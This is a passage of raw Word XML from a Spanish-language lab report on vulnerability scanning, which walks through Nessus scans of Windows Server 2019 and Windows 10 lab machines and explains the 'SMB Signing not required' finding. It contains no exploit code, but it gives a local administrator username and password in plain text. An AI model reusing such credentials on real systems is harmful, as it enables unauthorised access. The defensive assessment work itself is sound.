          <w:p w14:paraId="02E8C990" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="2BD4B638" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="5543E10F" w14:textId="3F7B8CD7" w:rsidR="00526B7F" w:rsidRDefault="00601301" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Obteniendo estos resultados en la máquina Windows Server 2019 DC02:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C2E5D34" w14:textId="77777777" w:rsidR="00601301" w:rsidRDefault="00601301" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="4B0BA16B" w14:textId="60337C68" w:rsidR="00601301" w:rsidRDefault="00601301" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="323899BE" wp14:editId="406EE072">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="1097184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84975" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId75">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1CC0DA67" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="3B2FAE1B" w14:textId="7E77A6F4" w:rsidR="00526B7F" w:rsidRDefault="00601301" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F4CE6A3" wp14:editId="5438C8C4">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="50555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5498" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId76">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29B70330" w14:textId="77777777" w:rsidR="00601301" w:rsidRDefault="00601301" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="5B9D0187" w14:textId="5B2740A6" w:rsidR="00601301" w:rsidRDefault="00601301" w:rsidP="00D67ED3">
            <w:r>
              <w:t>No Encontrando ninguna vulnerabilidad.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE1132D" w14:textId="77777777" w:rsidR="00601301" w:rsidRDefault="00601301" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="7E04B21E" w14:textId="52BFD094" w:rsidR="00601301" w:rsidRDefault="00601301" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Ahora con la máquina Windows Server 2019 DC01:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61446BD3" w14:textId="77777777" w:rsidR="004E0B22" w:rsidRDefault="004E0B22" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="4F129D4D" w14:textId="476CE5DA" w:rsidR="004E0B22" w:rsidRDefault="004E0B22" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37BAA720" wp14:editId="0EAA42AE">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="756410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0717" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId77">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07973F32" w14:textId="56E3FBC8" w:rsidR="004E0B22" w:rsidRDefault="004E0B22" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="033F03D2" wp14:editId="238252CD">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="324899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99480" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId78">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1A846222" w14:textId="1881AB6D" w:rsidR="004E0B22" w:rsidRDefault="004E0B22" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Sin encontrar ninguna vulnerabilidad.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E72A11" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="0906763C" w14:textId="15A90F25" w:rsidR="00DB4357" w:rsidRDefault="008729A3" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Ahora veremos con la máquina Windows 10:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF11ED1" w14:textId="0333E6EF" w:rsidR="00DB4357" w:rsidRDefault="008729A3" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792F2148" wp14:editId="201CCBC9">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="195660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4234" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId79">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015361BA" w14:textId="77777777" w:rsidR="008729A3" w:rsidRDefault="008729A3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="7CA4D681" w14:textId="6ECBC3E5" w:rsidR="00EA21B9" w:rsidRDefault="00EA21B9" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A270A0D" wp14:editId="66B950E3">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="1787867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7342" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId80">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37A371E8" w14:textId="77777777" w:rsidR="00EA21B9" w:rsidRDefault="00EA21B9" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="2C3EC0CE" w14:textId="2BD0BF25" w:rsidR="008729A3" w:rsidRDefault="008729A3" w:rsidP="00D67ED3">
            <w:r>
              <w:t xml:space="preserve">Encontrando </w:t>
            </w:r>
            <w:r w:rsidR="00EA21B9">
              <w:t>diversas</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> vulnerabilidades</w:t>
            </w:r>
            <w:r w:rsidR="00EA21B9">
              <w:t>, la mayoría pertenecientes al servicio de rejjeto.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="105D2AF5" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="232F1C81" w14:textId="77777777" w:rsidR="00EA21B9" w:rsidRDefault="00EA21B9" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="00E9C75B" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00386103">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23C66537" w14:textId="77777777" w:rsidR="00194707" w:rsidRPr="00194707" w:rsidRDefault="00194707" w:rsidP="00194707"/>
          <w:p w14:paraId="170E249C" w14:textId="00DEDDA6" w:rsidR="00AA6BA5" w:rsidRDefault="00AA6BA5" w:rsidP="00AA6BA5">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="21" w:name="_Toc135575978"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Escaneo de vulnerabilidades con Nessus y openvas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="21"/>
          </w:p>
          <w:p w14:paraId="3790F562" w14:textId="77777777" w:rsidR="00AA6BA5" w:rsidRDefault="00AA6BA5" w:rsidP="00AA6BA5"/>
          <w:p w14:paraId="78266540" w14:textId="77777777" w:rsidR="00AA6BA5" w:rsidRPr="00AA6BA5" w:rsidRDefault="00AA6BA5" w:rsidP="00AA6BA5"/>
          <w:p w14:paraId="466A9D58" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72986C40" w14:textId="12D05FC5" w:rsidR="00BE1898" w:rsidRDefault="00E83B6A" w:rsidP="00E83B6A">
            <w:pPr>
              <w:pStyle w:val="Ttulo3"/>
            </w:pPr>
            <w:bookmarkStart w:id="22" w:name="_Toc135575979"/>
            <w:r>
              <w:t>Máquina Windows10 -&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="22"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13978B7F" w14:textId="77777777" w:rsidR="00924F33" w:rsidRDefault="00924F33" w:rsidP="00924F33">
            <w:pPr>
              <w:pStyle w:val="Ttulo4"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39A05F4F" w14:textId="270DA7EC" w:rsidR="00BE1898" w:rsidRDefault="00924F33" w:rsidP="00924F33">
            <w:pPr>
              <w:pStyle w:val="Ttulo4"/>
            </w:pPr>
            <w:r>
              <w:t>1.Nessus -&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="759B4F35" w14:textId="77777777" w:rsidR="00924F33" w:rsidRDefault="00924F33" w:rsidP="00924F33"/>
          <w:p w14:paraId="7E6AD22E" w14:textId="192AA78A" w:rsidR="00924F33" w:rsidRDefault="006B017F" w:rsidP="00924F33">
            <w:r>
              <w:t>Primero abriremos Nessus y le daremos a new scan:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA81500" w14:textId="22CCA0D3" w:rsidR="006B017F" w:rsidRPr="00924F33" w:rsidRDefault="006B017F" w:rsidP="00924F33">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F428AEF" wp14:editId="56D8A2DA">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="899345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5257" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId81" cstate="screen">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229D6E70" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50E29155" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35F09849" w14:textId="7AB71130" w:rsidR="00BE1898" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora elegiremos el tipo de escaneo que vamos a usar, en todos los casos que vamos a ver será Advanced Scan:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0CC87D" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="502A7D3B" w14:textId="288BCB39" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1600002F" wp14:editId="1913C093">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="2013972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72775" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId82" cstate="screen">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58D82343" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="443EA529" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34D7990B" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6730BFC8" w14:textId="7319375D" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Primero iremos a credentials:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67DC9655" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="112342F5" w14:textId="43BC2563" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23F3163E" wp14:editId="3FA902BE">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="1279401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01802" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId83" cstate="screen">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5BE04FBE" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B0CD29A" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EDFC76C" w14:textId="5561668D" w:rsidR="006B017F" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Ahora elegiremos donde pone Windows  ponderemos el usuario y la contraseña, que en este caso será el usuario Administrador local de la máquina Windows 10, que es Alesander ‘abc123.’ .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731CB137" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35EBD600" w14:textId="6515C7D3" w:rsidR="006B017F" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F9FD939" wp14:editId="025D24F2">
                  <wp:extent cx="6645910" cy="2981960"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
                  <wp:docPr id="886967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67823" name=""/>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6645910" cy="2981960"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7309125B" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56294582" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F407B7B" w14:textId="77777777" w:rsidR="00806EBA" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="062A8C8F" w14:textId="77777777" w:rsidR="00806EBA" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AB48136" w14:textId="41DF91A1" w:rsidR="00806EBA" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38E2AEBF" wp14:editId="6B56A662">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="456319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19448" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId85">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0DE705C" w14:textId="77777777" w:rsidR="00806EBA" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="313989C6" w14:textId="7EFCD99B" w:rsidR="00806EBA" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora haremos clic en save y en la página principal del escáner solo nos queda colocar el nombre del escáner y la IP de la máquina que vamos escanear:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D53F9DF" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="662B0E1D" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75F2229B" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13530064" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0755F5DC" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45DB1212" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="428690E4" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BACEE73" w14:textId="16EBD375" w:rsidR="006B017F" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701BE8BF" wp14:editId="79BCDEE5">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="771114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4032" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId86">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34B2C456" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5857548A" w14:textId="1C04A3C9" w:rsidR="006B017F" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora volveremos a la página principal, haremos clic en el botón de play:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD7FEAE" w14:textId="77777777" w:rsidR="00806EBA" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65D0D327" w14:textId="017EB5CE" w:rsidR="00806EBA" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75114C31" wp14:editId="33A4E206">
                  <wp:extent cx="6645910" cy="1664970"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="695909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09859" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId87" cstate="screen">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="1664970"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="72527D60" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7007157E" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08694EBF" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2687191F" w14:textId="77777777" w:rsidR="006B017F" w:rsidRDefault="006B017F" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12EC4673" w14:textId="7C1D6844" w:rsidR="00BE1898" w:rsidRDefault="00806EBA" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Y con esto empezará el </w:t>
            </w:r>
            <w:r w:rsidR="00316CB3">
              <w:t>escáner</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F55ED9B" w14:textId="77777777" w:rsidR="00BE1898" w:rsidRDefault="00BE1898" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A558CDD" w14:textId="058B7260" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51AF7855" wp14:editId="53A83C34">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="2093405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5110" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId88" cstate="screen">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61BD55B5" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62170CCF" w14:textId="5C2B1AD0" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Encontrando una vulnerabilidad de nivel alto y una de nivel medio además de 43 informativas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="198B1476" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23666473" w14:textId="09B4F91B" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Vamos analizar la vulnerabilidad de nivel medio y la de nivel bajo:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B4A9AB" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="761E87CA" w14:textId="0341D5D9" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FB59FE8" wp14:editId="45C431FE">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="977568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8001" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId89" cstate="screen">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49A7053C" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E51BE53" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRPr="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r w:rsidRPr="002F1CB6">
              <w:t>SMB (Server Message Block) es un protocolo de red utilizado por los sistemas operativos Windows para compartir archivos, impresoras y otros recursos en una red. La vulnerabilidad "SMB Signing not required" se refiere a la configuración de un servidor SMB que no requiere la firma digital de los mensajes enviados por los clientes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60FF5755" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRPr="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r w:rsidRPr="002F1CB6">
              <w:t>La firma digital proporciona una capa de seguridad adicional al verificar la autenticidad e integridad de los mensajes enviados entre el servidor y el cliente. Si un servidor SMB no requiere la firma digital, los atacantes pueden aprovechar esta vulnerabilidad para interceptar y modificar los mensajes SMB, lo que podría permitirles ejecutar ataques de suplantación de identidad, robo de datos o incluso tomar el control del servidor.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC64846" w14:textId="77777777" w:rsidR="002F1CB6" w:rsidRPr="002F1CB6" w:rsidRDefault="002F1CB6" w:rsidP="002F1CB6">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r w:rsidRPr="002F1CB6">
